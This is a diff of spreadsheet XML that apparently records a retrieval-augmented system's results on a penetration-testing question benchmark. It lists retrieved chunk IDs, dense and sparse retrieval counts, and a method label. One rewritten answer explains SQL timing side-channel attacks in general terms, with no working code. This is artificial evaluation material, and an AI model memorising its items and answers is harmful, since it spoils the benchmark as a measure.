       <c r="I194" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J194" t="n">
@@ -13514,7 +13492,7 @@
       </c>
       <c r="K194" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13563,17 +13541,17 @@
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I195" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J195" t="n">
@@ -13581,7 +13559,7 @@
       </c>
       <c r="K195" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13616,7 +13594,7 @@
       <c r="F196" t="inlineStr">
         <is>
           <t>Answer: Implement side-channel attack through SQL timing differences
-Explanation: In a red team operation, implementing a side-channel attack through SQL timing differences would be the most effective method for identifying timing attack vectors in a web application's database interaction. Side-channel attacks exploit information leaks from the system to infer sensitive data that should not be accessible. By analyzing the timing of responses during SQL interactions, an attacker can potentially identify timing differences that could indicate vulnerabilities or hidden functionality within the database. This method is more direct and specific to the context of web application database interaction compared to the other options provided.</t>
+Explanation: The correct answer is 'Implement side-channel attack through SQL timing differences'. This technique involves measuring how long it takes for the database to respond to various queries. By analyzing the time differences, an attacker can infer information about the database or formulate efficient attack strategies. Option 0, 'Using an HTTP GET request to trigger buffer overflow vulnerabilities', is a plausible technique, but it does not pertain to identifying timing vectors as it is primarily geared towards exploiting memory corruption issues. Option 1, 'Exploiting SQL injection flaws using INPUT method instead of POST or GET', is incorrect as SQL injection involves incorrect handling of user inputs primarily via SQL queries and the INPUT method is not recognized in HTTP standards. Finally, option 3, 'Leveraging CSRF tokens to bypass authentication controls', involves session riding and does not help in identifying timing attack vectors either.</t>
         </is>
       </c>
       <c r="G196" t="inlineStr">
@@ -13632,15 +13610,15 @@
 preemware_pentestingeval.pdf (Chunk: 9de1e388-e5f2-4d4a-ae47-ac3a137f820e, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: b0a2fbea-59dd-4895-a643-c4597f5aa857, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I196" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J196" t="n">
@@ -13648,7 +13626,7 @@
       </c>
       <c r="K196" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13697,17 +13675,17 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I197" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J197" t="n">
@@ -13715,7 +13693,7 @@
       </c>
       <c r="K197" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13764,17 +13742,17 @@
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 1757437a-60fa-4600-b485-c0b3a0a51e87, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I198" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J198" t="n">
@@ -13782,7 +13760,7 @@
       </c>
       <c r="K198" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13829,19 +13807,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 1bf7372e-dcae-42ee-a9d9-0b1222053518, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I199" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J199" t="n">
@@ -13849,7 +13827,7 @@
       </c>
       <c r="K199" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13896,10 +13874,10 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 1d9c2c29-6258-4807-8e78-b88b13c24f33, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 9)
@@ -13908,7 +13886,7 @@
       </c>
       <c r="I200" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J200" t="n">
@@ -13916,7 +13894,7 @@
       </c>
       <c r="K200" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -13964,18 +13942,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: sparse, Rank: 8)
 cowWhySo-pentest-redteam-steering.md (Chunk: d910beef-14dc-4c05-b3d9-2938a3f085fa, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I201" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J201" t="n">
@@ -13983,7 +13961,7 @@
       </c>
       <c r="K201" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14029,20 +14007,20 @@
       <c r="H202" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 9388f2c2-3f20-4989-a7c4-7cdc85cb53d9, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 87048b29-953d-48db-b238-14fcc81ffe15, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 8)
-4.Post-Exploitation_readme.md (Chunk: 8ce27f0e-817a-49c5-abda-2a4fd3b76c89, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 87048b29-953d-48db-b238-14fcc81ffe15, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 7)
+4.Post-Exploitation_readme.md (Chunk: 8ce27f0e-817a-49c5-abda-2a4fd3b76c89, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I202" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 4, Keyword: 6, Total: 10</t>
         </is>
       </c>
       <c r="J202" t="n">
@@ -14050,7 +14028,7 @@
       </c>
       <c r="K202" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14099,17 +14077,17 @@
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I203" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J203" t="n">
@@ -14117,7 +14095,7 @@
       </c>
       <c r="K203" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14166,18 +14144,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: a1d06e69-76d1-44d2-b3ae-17403f4d666f, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 886c0100-4171-4d07-9b3c-7a8a56badd8f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d83b16e3-cab4-4909-9965-40af03525749, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I204" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J204" t="n">
@@ -14185,7 +14163,7 @@
       </c>
       <c r="K204" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14233,18 +14211,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 886c0100-4171-4d07-9b3c-7a8a56badd8f, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: a50681c0-06cb-4ca1-821f-95ab56a6e118, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 7ff70824-6194-4554-86fe-63aa3ae35f19, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 7ff70824-6194-4554-86fe-63aa3ae35f19, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I205" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J205" t="n">
@@ -14252,7 +14230,7 @@
       </c>
       <c r="K205" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14301,17 +14279,17 @@
 preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 9)
-return-to-libc.md (Chunk: 88bba896-cf55-4993-82d3-104c0c450d86, Type: dense, Rank: 10)</t>
+return-to-libc.md (Chunk: 88bba896-cf55-4993-82d3-104c0c450d86, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I206" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J206" t="n">
@@ -14319,7 +14297,7 @@
       </c>
       <c r="K206" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14371,14 +14349,14 @@
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I207" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J207" t="n">
@@ -14386,7 +14364,7 @@
       </c>
       <c r="K207" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14436,16 +14414,16 @@
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: ba50b01d-44c3-44e7-a0b6-256236393541, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 7)
